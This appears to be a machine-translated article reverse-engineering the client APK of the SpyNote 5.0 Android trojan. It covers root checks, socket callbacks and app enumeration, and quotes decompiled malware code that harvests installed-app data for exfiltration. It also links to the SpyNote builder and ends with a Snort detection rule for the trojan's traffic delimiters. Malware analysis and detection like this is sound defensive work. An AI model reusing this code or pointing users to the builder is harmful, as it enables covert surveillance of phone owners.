Shulou(Shulou.com)05/31 Report--

Today, I would like to talk to you about how to carry out SpyNote5.0 Client_APK reverse analysis, many people may not know much about it. In order to make you understand better, the editor has summarized the following content for you. I hope you can get something according to this article.

1. What is SpyNote5.0?

SpyNote is a tool used to create Android malicious programs. Its functions are eye-catching, such as reading contacts, recording, command execution, application management, keyboard logging, GPS location, and so on. These functions play a connecting role in the study of malicious programs on the Android side. We can get a preliminary understanding of its use through a series of articles, "SpyNote v5.0 graphical tool remote Management Android Mobile phone tutorial", "be careful, Android Trojan tool SpyNote is free!" Remote monitoring is that simple. "be careful, Android remote Control (spynote) has been upgraded." "wait a minute.

two。 Prepare the tool

Few people pay attention to the reverse analysis of SpyNote5.0 Client_APK, so let me briefly introduce the use of tools, and then start to enter the reverse analysis process.

1 、 SpyNote5.0

Download address: https://github.com/soDLL/SpyNote OR https://github.com/miladzero/SpyNote

2 、 jadx-gui

Download address: https://github.com/skylot/jadx/releases

3 、 androidkiller

Download address: https://www.guguzhu.com/soft/270509.html

3. Start reverse analysis

We begin to analyze Client_APK and usually like to drag client-generated APK programs into androidkiller. After dragging into the program, androidkiller will automatically disassemble it, and then the program will analyze the results.

On the left, you can see that the client needs a lot of application permissions by classifying Activity, Receiver, Service, and application permissions (Uses-Permisson) according to inheritance relationships. On the right is the smail assembly window and workbench. Through this tool, you can clearly see the permissions and all kinds of inheritance relationships, but the version of the tool is relatively low and the code restoration is not perfect. I replaced the tool with jadx-gui, and then continued to reverse analyze and import Client_APK.

We can see three packages, which are android.support,con.eset.ems2.gp,yps.eton.application. Among them, android.support is the Android support package, which includes low version, v4, v7 con.eset.ems2.gp for the configuration package contains host, client_name and other information, yps.eton.application is what we need to analyze.

Open yps.eton.application, we can see 14 classes, due to the need to analyze more code, so targeted for some of the key code for analysis.

From the previous androidkiller analysis structure, we can see that the writing classes A, F, G, k inherit the continuous running of Service,Service on behalf of the background in Android. Let's guess what might need to be running continuously in Client_APK? It may be that key objects continue to run, controlled, monitored, multithreaded, and so on. The focus of our analysis is on some of its functions and how to identify traffic.

3.1 Command execution startup analysis

Let's start with method A, which starts the service, iterates through the R object, takes the third element, and executes j () if it is equal to 1. Otherwise, start the service after determining whether a () has been instantiated. After that, it will continue to determine whether j () has root permissions.

Continue to look at j (), j (), after executing the su command, Do I have root? Write to the file / system/sd/temporary.txt to determine whether it is root permission or not.

Then look at h (), where multithreading is used to get the configuration parameters stored in the R object, using loops and socket to send back information.

3.2Functional analysis of Base64 coding application

When I look at the import list of An objects, I find that android.util.Base64 is included, indicating that base64 encoding is used in the run. Then search for the keyword Base64, and you can see that Base64 is wrapped in ((BitmapDrawable) applicationIcon). GetBitmap (), but inside is the application icon. The client transfers some information at the end of 9xf89fff9xf89 through c0c1c3a2c0c1c segmentation, and uses fxf0x4x4x0fxf segmentation to transmit abnormal information and options.

Public void k () {new Thread (new Runnable () {public void run () {String str; try {StringBuffer stringBuffer = new StringBuffer (); PackageManager packageManager = A.this.getApplicationContext (). GetPackageManager (); for (ApplicationInfo applicationInfo: packageManager.getInstalledApplications) {if (packageManager.getLaunchIntentForPackage (applicationInfo.packageName)! = null & &! packageManager.getLaunchIntentForPackage (applicationInfo.packageName). Equals (")) {try {Date date = new Date (packageManager.getPackageInfo (applicationInfo.packageName, 4096) .firstInstallTime) String str2 = packageManager.getLaunchIntentForPackage (applicationInfo.packageName)! = null? (applicationInfo.flags & 1) = = 1? "system": "user": "; Drawable applicationIcon = packageManager.getApplicationIcon (applicationInfo.packageName); String str3 = new String (); if (applicationIcon! = null) {Bitmap bitmap = ((BitmapDrawable) applicationIcon). GetBitmap (); ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream (); bitmap.compress (CompressFormat.JPEG, 50, byteArrayOutputStream); str = Base64.encodeToString (byteArrayOutputStream.toByteArray (), 2);} else {str = str3 } stringBuffer.append (packageManager.getApplicationLabel (applicationInfo) + "c0c1c3a2c0c1c" + applicationInfo.packageName + "c0c1c3a2c0c1c" + str + "c0c1c3a2c0c1c" + str2 + "c0c1c3a2c0c1c" + date.toString () + "c0c1c3a2c0c1c" + A.this.getPackageName () + "9xf89fff9xf89");} catch (NameNotFoundException e) {A.this.h ("applicationsfxf0x4x4x0fxf [My/Exception]" + e.getMessage (). ToString ());} A.this.h ("applicationsfxf0x4x4x0fxf" + stringBuffer.toString ()) } catch (Exception e2) {A.this.h ("applicationsfxf0x4x4x0fxf [My/Exception]" + e2.getMessage (). ToString ());}) .start ();}

3.3 functional analysis of information acquisition

Method B is the longest method in object A, which contains too many branches of switch case statements that cause disassembly exceptions. Looking at the comments, it is not difficult to see that most of the logic of obtaining information is implemented. For example, Device info, System info, Sim info, WIFI info, and so on, contain the features advertised by the tool.

There are some things to note in the rewrite of the b method, which is used to get the storage path. The delimiter for transmitting path information uses e1x1114x61114e. The file name information delimiter is used with-1c0c1c3a2c0c1c-1c0c1c3a2c0c1c-1c0c1c3a2c0c1c. Through these information, the operation of client transmission can be judged more accurately.

4. Summary

The realization of each function can be seen in the process of analysis. Client uses unencrypted and Base-encoded transmissions, the most obvious of which are split symbols. The transmission behavior of Client can be effectively judged by the program. So grab the packet for the transmission process.

The delimiter and base64 encoding are clearly seen in the figure. For this, we can write rules in Snort to identify, and identify examples:

Alert tcp any any-> any any (content: "fxf0x4x4x0fxf"; sid:1; msg:SpyNote5.0 Client;)

After reading the above, do you have any further understanding of how to carry out SpyNote5.0 Client_APK reverse analysis? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.